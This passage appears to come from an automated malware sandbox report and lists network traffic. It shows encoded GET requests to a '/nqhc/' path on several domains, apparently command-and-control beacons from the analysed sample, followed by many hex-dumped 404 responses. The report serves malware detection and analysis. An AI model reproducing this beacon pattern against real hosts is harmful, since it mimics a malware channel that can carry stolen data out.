      Source: global trafficHTTP traffic detected: GET /nqhc/?b6=1b9p&r4txB=LdV+lgJdmfuEMP3jUfrE9r0MLHENHMoAvR3n1HnrztGZNsUQ943e3pzfBc8//iPa0aHj65ptHNl5my2qaj9ZRSJvwgLgjYR0TA== HTTP/1.1Host: www.labour-office.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?r4txB=HWUkI9TTae9E16Ico4VYIxYl96Wd6gyAbZTC2FoY75Z91OR/nsTZW6u7F26sGGS3r1HZf2jS9pu5KUGpbE/+fGNm2HkM109OTw==&b6=1b9p HTTP/1.1Host: www.codemars.academyConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewIP Address: 194.245.148.189 194.245.148.189
      Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: openresty/1.13.6.1date: Mon, 21 Nov 2022 18:20:01 GMTcontent-type: text/htmlcontent-length: 175connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty/1.13.6.1</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Mon, 21 Nov 2022 18:20:17 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f c1 6a c3 30 10 44 ef fe 8a 6d 4e cd a1 5a 27 b8 d0 83 10 b4 b1 43 03 4e 6a 1a f9 90 a3 12 6d 90 21 b1 5c 49 ae db bf af ec 50 c8 65 61 76 df 0e 33 fc 21 ff 58 c9 43 55 c0 bb dc 96 50 d5 6f e5 66 05 b3 27 c4 4d 21 d7 88 b9 cc 6f 97 25 4b 11 8b dd 4c 24 dc 84 eb 45 70 43 4a 47 11 9a 70 21 91 a5 19 ec 6c 80 b5 ed 5b cd f1 b6 4c 38 4e 10 3f 5a fd 3b fe 2d c4 1d 13 55 c2 3b 21 0d 81 a3 af 9e 7c 20 0d f5 67 09 83 f2 d0 46 ee 3c 72 60 5b 08 a6 f1 e0 c9 7d 93 63 1c bb d1 c9 c5 a1 b4 76 e4 bd 78 ed d4 c9 10 2e 59 c6 9e 17 f0 58 b7 cd cf 1c f6 13 0e 2a c0 30 0c cc 93 72 27 73 b4 81 f9 1e 2a eb 02 bc a4 1c ff 0d 62 ce 29 61 cc 34 36 4b fe 00 08 94 dc 0d 14 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e9Mj0DmNZ'CNjm!\IPeav3!XCUPof'M!o%KL$EpCJGp!l[L8N?Z;-U;!| gF<r`[}cvx.YX*0r's*b)a46K0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Mon, 21 Nov 2022 18:20:19 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f c1 6a c3 30 10 44 ef fe 8a 6d 4e cd a1 5a 27 b8 d0 83 10 b4 b1 43 03 4e 6a 1a f9 90 a3 12 6d 90 21 b1 5c 49 ae db bf af ec 50 c8 65 61 76 df 0e 33 fc 21 ff 58 c9 43 55 c0 bb dc 96 50 d5 6f e5 66 05 b3 27 c4 4d 21 d7 88 b9 cc 6f 97 25 4b 11 8b dd 4c 24 dc 84 eb 45 70 43 4a 47 11 9a 70 21 91 a5 19 ec 6c 80 b5 ed 5b cd f1 b6 4c 38 4e 10 3f 5a fd 3b fe 2d c4 1d 13 55 c2 3b 21 0d 81 a3 af 9e 7c 20 0d f5 67 09 83 f2 d0 46 ee 3c 72 60 5b 08 a6 f1 e0 c9 7d 93 63 1c bb d1 c9 c5 a1 b4 76 e4 bd 78 ed d4 c9 10 2e 59 c6 9e 17 f0 58 b7 cd cf 1c f6 13 0e 2a c0 30 0c cc 93 72 27 73 b4 81 f9 1e 2a eb 02 bc a4 1c ff 0d 62 ce 29 61 cc 34 36 4b fe 00 08 94 dc 0d 14 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e9Mj0DmNZ'CNjm!\IPeav3!XCUPof'M!o%KL$EpCJGp!l[L8N?Z;-U;!| gF<r`[}cvx.YX*0r's*b)a46K0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Mon, 21 Nov 2022 18:20:21 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f c1 6a c3 30 10 44 ef fe 8a 6d 4e cd a1 5a 27 b8 d0 83 10 b4 b1 43 03 4e 6a 1a f9 90 a3 12 6d 90 21 b1 5c 49 ae db bf af ec 50 c8 65 61 76 df 0e 33 fc 21 ff 58 c9 43 55 c0 bb dc 96 50 d5 6f e5 66 05 b3 27 c4 4d 21 d7 88 b9 cc 6f 97 25 4b 11 8b dd 4c 24 dc 84 eb 45 70 43 4a 47 11 9a 70 21 91 a5 19 ec 6c 80 b5 ed 5b cd f1 b6 4c 38 4e 10 3f 5a fd 3b fe 2d c4 1d 13 55 c2 3b 21 0d 81 a3 af 9e 7c 20 0d f5 67 09 83 f2 d0 46 ee 3c 72 60 5b 08 a6 f1 e0 c9 7d 93 63 1c bb d1 c9 c5 a1 b4 76 e4 bd 78 ed d4 c9 10 2e 59 c6 9e 17 f0 58 b7 cd cf 1c f6 13 0e 2a c0 30 0c cc 93 72 27 73 b4 81 f9 1e 2a eb 02 bc a4 1c ff 0d 62 ce 29 61 cc 34 36 4b fe 00 08 94 dc 0d 14 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e9Mj0DmNZ'CNjm!\IPeav3!XCUPof'M!o%KL$EpCJGp!l[L8N?Z;-U;!| gF<r`[}cvx.YX*0r's*b)a46K0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Mon, 21 Nov 2022 18:20:23 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 276Connection: closeVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 31 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 73 65 61 72 63 68 62 6f 74 2e 73 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.51 (Unix) Server at www.searchbot.su Port 80</address></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Nov 2022 18:20:41 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://royaltechglobal.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 13045Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 72 6b 73 db c6 b2 ed 67 a9 ea fe 87 31 5c 89 a4 2d 02 20 f8 d0 83 22 99 63 2b ce e3 1c 3b ce b1 9c 9d bb 4f 9c 52 0d 80 26 30 d6 60 06 99 19 90 62 74 f4 df 6f 0f 00 be 24 8a a2 5f 3b 55 77 6f da 22 67 7a ba 57 af 5e bd fa 4f be 7d 7d fe f6 1f 3f bf 20 a9 c9 f8 70 77 b7 6f 7f 49 cc d4 c0 e1 46 39 84 53 91 0c 1c 10 ee 2f 17 ce ee 4e ae 60 c4 ae 07 8e 4c 7a 58 60 72 dd f3 7d 99 e4 5e 06 be d0 4f 1d 82 00 3b fd 14 68 3c dc dd 21 64 a7 9f 81 a1 24 4a a9 d2 60 06 ce 2f 6f bf 73 4f 9c e5 27 41 33 18 38 63 06 93 5c 2a e3 90 48 0a 03 02 53 27 2c 36 e9 20 86 31 8b c0 2d 2f 75 dd ee ce 4e ff 89 eb 92 67 9c 13 26 c8 6b 01 e4 e2 c5 6b d2 f1 5a de b1 17 10 97 50 26 35 48 2f 92 19 71 dd a1 4d 5f ea a4 64 28 8d 5e ea 23 24 13 31 5c 3b c4 bf 9b 9a 80 00 45 8d 54 4b d9 77 9a ee 3f fb f1 35 fe 1e cc bb cf 60 74 a4 58 6e 88 99 e6 08 44 f3 9c b3 88 1a 26 85 cf e3 c3 f7 5a 0a 84 e4 54 6b 7c 2b c9 ba 3a 4a 21 a3 76 c2 9d 9d 1b e7 3f ca 7e d7 c6 e9 39 95 c6 ef fc 77 7e 95 e2 49 95 38 0d e7 3f 12 45 f3 d4 e9 fd 86 c9 b6 09 66 3e 57 a8 7a a4 8a 2c 7c c9 b4 b1 39 2c 5e 01 50 72 4a b9 81 28 4d b8 0c 29 b7 02 bd f3 c5 1f 69 f4 ce 7f 1a ce 8b 79 55 cc 0c 64 16 e7 05 87 0c 27 5f e9 64 e3 3f e2 fb b6 3d 9e f2 45 41 2e 35 b3 42 38 bd a0 6a e2 f4 16 c0 bf 42 f8 33 4d 60 5b 5c cc b3 9b c2 c4 1f 64 66 ab 0a c5 b7 a8 ba c5 32 14 b7 24 b4 ad 3e f3 09 6e 1b 1f af c3 5d ac 65 35 5a 9f ac 46 85 be d0 e4 27 69 c8 77 b2 10 f1 b6 c2 d4 00 28 4f ae 60 cc 64 a1 b7 93 68 49 9c df 97 e5 79 ad 12 2a d8 9f a5 ef b7 b6 8a 5c 2d aa 67 79 63 73 c9 5b 4c 26 df 97 d9 5b 2f bb e1 70 99 c8 65 59 7f cc 50 d4 d7 e1 7b 88 cc b6 28 93 dc 8d a4 30 20 cc 3b bf c8 b9 a4 b1 7e e7 b7 9a ad d6 3b 3f 08 de f9 91 92 79 0e b1 fb 12 3b bd a2 57 ca 0d bc 5c 24 1f 35 b2 85 c0 c2 09 8b 4d 8a a6 e8 34 1b 4e 0a 2c 49 8d d3 eb b4 71 33 cc 92 2f a7 f9 38 e8 db e5 05 7d 94 c1 9e 4e 20 cc ab aa 0f 71 15 52 17 2f a9 48 8a 92 bf 03 c2 fd e5 c2 06 f5 cf 54 99 d7 a3 ed 47 c2 f6 9a 19 b0 36 0d 15 d0 38 52 45 16 6e 5d 5e cf b0 a8 b4 de bd a7 ca 85 6d b0 ed fa 66 84 b6 77 e4 06 53 af 15 29 2f 2c cd 14 d4 c7 2d 1e c7 fb fd 76 77 67 a7 ef eb 48 b1 dc 0c ed f9 89 eb 92 67 9c 13 26 c8 6b 01 e4 e2 c5 6b e2 ba c3 dd dd dd ea e9 6d ca 34 b1 63 11 fc 95 b9 61 19 fb 13 62 32 61 26 25 26 05 f2 0f 49 b5 29 ab 72 5e 24 08 32 0e 4e bd a0 49 5c 52 31 f3 fd a9 cd b0 6c fc 89 54 71 ae 40 6b bf ca d5 be 06 e9 97 ed 76 fa 86 19 0e 43 6b 43 22 a4 21 23 59 88 18 51 ee 69 d3 f7 ab 4c 2c c9 c0 50 92 2b 99 83 32 d3 81 23 93 1e 97 11 e5 e0 90 48 0a 03 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Nov 2022 18:20:44 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://royaltechglobal.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 13045Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 72 6b 73 db c6 b2 ed 67 a9 ea fe 87 31 5c 89 a4 2d 02 20 f8 d0 83 22 99 63 2b ce e3 1c 3b ce b1 9c 9d bb 4f 9c 52 0d 80 26 30 d6 60 06 99 19 90 62 74 f4 df 6f 0f 00 be 24 8a a2 5f 3b 55 77 6f da 22 67 7a ba 57 af 5e bd fa 4f be 7d 7d fe f6 1f 3f bf 20 a9 c9 f8 70 77 b7 6f 7f 49 cc d4 c0 e1 46 39 84 53 91 0c 1c 10 ee 2f 17 ce ee 4e ae 60 c4 ae 07 8e 4c 7a 58 60 72 dd f3 7d 99 e4 5e 06 be d0 4f 1d 82 00 3b fd 14 68 3c dc dd 21 64 a7 9f 81 a1 24 4a a9 d2 60 06 ce 2f 6f bf 73 4f 9c e5 27 41 33 18 38 63 06 93 5c 2a e3 90 48 0a 03 02 53 27 2c 36 e9 20 86 31 8b c0 2d 2f 75 dd ee ce 4e ff 89 eb 92 67 9c 13 26 c8 6b 01 e4 e2 c5 6b d2 f1 5a de b1 17 10 97 50 26 35 48 2f 92 19 71 dd a1 4d 5f ea a4 64 28 8d 5e ea 23 24 13 31 5c 3b c4 bf 9b 9a 80 00 45 8d 54 4b d9 77 9a ee 3f fb f1 35 fe 1e cc bb cf 60 74 a4 58 6e 88 99 e6 08 44 f3 9c b3 88 1a 26 85 cf e3 c3 f7 5a 0a 84 e4 54 6b 7c 2b c9 ba 3a 4a 21 a3 76 c2 9d 9d 1b e7 3f ca 7e d7 c6 e9 39 95 c6 ef fc 77 7e 95 e2 49 95 38 0d e7 3f 12 45 f3 d4 e9 fd 86 c9 b6 09 66 3e 57 a8 7a a4 8a 2c 7c c9 b4 b1 39 2c 5e 01 50 72 4a b9 81 28 4d b8 0c 29 b7 02 bd f3 c5 1f 69 f4 ce 7f 1a ce 8b 79 55 cc 0c 64 16 e7 05 87 0c 27 5f e9 64 e3 3f e2 fb b6 3d 9e f2 45 41 2e 35 b3 42 38 bd a0 6a e2 f4 16 c0 bf 42 f8 33 4d 60 5b 5c cc b3 9b c2 c4 1f 64 66 ab 0a c5 b7 a8 ba c5 32 14 b7 24 b4 ad 3e f3 09 6e 1b 1f af c3 5d ac 65 35 5a 9f ac 46 85 be d0 e4 27 69 c8 77 b2 10 f1 b6 c2 d4 00 28 4f ae 60 cc 64 a1 b7 93 68 49 9c df 97 e5 79 ad 12 2a d8 9f a5 ef b7 b6 8a 5c 2d aa 67 79 63 73 c9 5b 4c 26 df 97 d9 5b 2f bb e1 70 99 c8 65 59 7f cc 50 d4 d7 e1 7b 88 cc b6 28 93 dc 8d a4 30 20 cc 3b bf c8 b9 a4 b1 7e e7 b7 9a ad d6 3b 3f 08 de f9 91 92 79 0e b1 fb 12 3b bd a2 57 ca 0d bc 5c 24 1f 35 b2 85 c0 c2 09 8b 4d 8a a6 e8 34 1b 4e 0a 2c 49 8d d3 eb b4 71 33 cc 92 2f a7 f9 38 e8 db e5 05 7d 94 c1 9e 4e 20 cc ab aa 0f 71 15 52 17 2f a9 48 8a 92 bf 03 c2 fd e5 c2 06 f5 cf 54 99 d7 a3 ed 47 c2 f6 9a 19 b0 36 0d 15 d0 38 52 45 16 6e 5d 5e cf b0 a8 b4 de bd a7 ca 85 6d b0 ed fa 66 84 b6 77 e4 06 53 af 15 29 2f 2c cd 14 d4 c7 2d 1e c7 fb fd 76 77 67 a7 ef eb 48 b1 dc 0c ed f9 89 eb 92 67 9c 13 26 c8 6b 01 e4 e2 c5 6b e2 ba c3 dd dd dd ea e9 6d ca 34 b1 63 11 fc 95 b9 61 19 fb 13 62 32 61 26 25 26 05 f2 0f 49 b5 29 ab 72 5e 24 08 32 0e 4e bd a0 49 5c 52 31 f3 fd a9 cd b0 6c fc 89 54 71 ae 40 6b bf ca d5 be 06 e9 97 ed 76 fa 86 19 0e 43 6b 43 22 a4 21 23 59 88 18 51 ee 69 d3 f7 ab 4c 2c c9 c0 50 92 2b 99 83 32 d3 81 23 93 1e 97 11 e5 e0 90 48 0a 03 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Nov 2022 18:20:46 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://royaltechglobal.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 13045Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 72 6b 73 db c6 b2 ed 67 a9 ea fe 87 31 5c 89 a4 2d 02 20 f8 d0 83 22 99 63 2b ce e3 1c 3b ce b1 9c 9d bb 4f 9c 52 0d 80 26 30 d6 60 06 99 19 90 62 74 f4 df 6f 0f 00 be 24 8a a2 5f 3b 55 77 6f da 22 67 7a ba 57 af 5e bd fa 4f be 7d 7d fe f6 1f 3f bf 20 a9 c9 f8 70 77 b7 6f 7f 49 cc d4 c0 e1 46 39 84 53 91 0c 1c 10 ee 2f 17 ce ee 4e ae 60 c4 ae 07 8e 4c 7a 58 60 72 dd f3 7d 99 e4 5e 06 be d0 4f 1d 82 00 3b fd 14 68 3c dc dd 21 64 a7 9f 81 a1 24 4a a9 d2 60 06 ce 2f 6f bf 73 4f 9c e5 27 41 33 18 38 63 06 93 5c 2a e3 90 48 0a 03 02 53 27 2c 36 e9 20 86 31 8b c0 2d 2f 75 dd ee ce 4e ff 89 eb 92 67 9c 13 26 c8 6b 01 e4 e2 c5 6b d2 f1 5a de b1 17 10 97 50 26 35 48 2f 92 19 71 dd a1 4d 5f ea a4 64 28 8d 5e ea 23 24 13 31 5c 3b c4 bf 9b 9a 80 00 45 8d 54 4b d9 77 9a ee 3f fb f1 35 fe 1e cc bb cf 60 74 a4 58 6e 88 99 e6 08 44 f3 9c b3 88 1a 26 85 cf e3 c3 f7 5a 0a 84 e4 54 6b 7c 2b c9 ba 3a 4a 21 a3 76 c2 9d 9d 1b e7 3f ca 7e d7 c6 e9 39 95 c6 ef fc 77 7e 95 e2 49 95 38 0d e7 3f 12 45 f3 d4 e9 fd 86 c9 b6 09 66 3e 57 a8 7a a4 8a 2c 7c c9 b4 b1 39 2c 5e 01 50 72 4a b9 81 28 4d b8 0c 29 b7 02 bd f3 c5 1f 69 f4 ce 7f 1a ce 8b 79 55 cc 0c 64 16 e7 05 87 0c 27 5f e9 64 e3 3f e2 fb b6 3d 9e f2 45 41 2e 35 b3 42 38 bd a0 6a e2 f4 16 c0 bf 42 f8 33 4d 60 5b 5c cc b3 9b c2 c4 1f 64 66 ab 0a c5 b7 a8 ba c5 32 14 b7 24 b4 ad 3e f3 09 6e 1b 1f af c3 5d ac 65 35 5a 9f ac 46 85 be d0 e4 27 69 c8 77 b2 10 f1 b6 c2 d4 00 28 4f ae 60 cc 64 a1 b7 93 68 49 9c df 97 e5 79 ad 12 2a d8 9f a5 ef b7 b6 8a 5c 2d aa 67 79 63 73 c9 5b 4c 26 df 97 d9 5b 2f bb e1 70 99 c8 65 59 7f cc 50 d4 d7 e1 7b 88 cc b6 28 93 dc 8d a4 30 20 cc 3b bf c8 b9 a4 b1 7e e7 b7 9a ad d6 3b 3f 08 de f9 91 92 79 0e b1 fb 12 3b bd a2 57 ca 0d bc 5c 24 1f 35 b2 85 c0 c2 09 8b 4d 8a a6 e8 34 1b 4e 0a 2c 49 8d d3 eb b4 71 33 cc 92 2f a7 f9 38 e8 db e5 05 7d 94 c1 9e 4e 20 cc ab aa 0f 71 15 52 17 2f a9 48 8a 92 bf 03 c2 fd e5 c2 06 f5 cf 54 99 d7 a3 ed 47 c2 f6 9a 19 b0 36 0d 15 d0 38 52 45 16 6e 5d 5e cf b0 a8 b4 de bd a7 ca 85 6d b0 ed fa 66 84 b6 77 e4 06 53 af 15 29 2f 2c cd 14 d4 c7 2d 1e c7 fb fd 76 77 67 a7 ef eb 48 b1 dc 0c ed f9 89 eb 92 67 9c 13 26 c8 6b 01 e4 e2 c5 6b e2 ba c3 dd dd dd ea e9 6d ca 34 b1 63 11 fc 95 b9 61 19 fb 13 62 32 61 26 25 26 05 f2 0f 49 b5 29 ab 72 5e 24 08 32 0e 4e bd a0 49 5c 52 31 f3 fd a9 cd b0 6c fc 89 54 71 ae 40 6b bf ca d5 be 06 e9 97 ed 76 fa 86 19 0e 43 6b 43 22 a4 21 23 59 88 18 51 ee 69 d3 f7 ab 4c 2c c9 c0 50 92 2b 99 83 32 d3 81 23 93 1e 97 11 e5 e0 90 48 0a 03 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Nov 2022 18:21:16 GMTContent-Type: text/htmlContent-Length: 153Connection: closeServer: nginx/1.16.1Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Nov 2022 18:21:18 GMTContent-Type: text/htmlContent-Length: 153Connection: closeServer: nginx/1.20.1Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Nov 2022 18:21:20 GMTContent-Type: text/htmlContent-Length: 153Connection: closeServer: nginx/1.16.1Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Nov 2022 18:21:22 GMTContent-Type: text/htmlContent-Length: 153Connection: closeServer: nginx/1.16.1Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 21 Nov 2022 18:21:28 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 21 Nov 2022 18:21:30 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
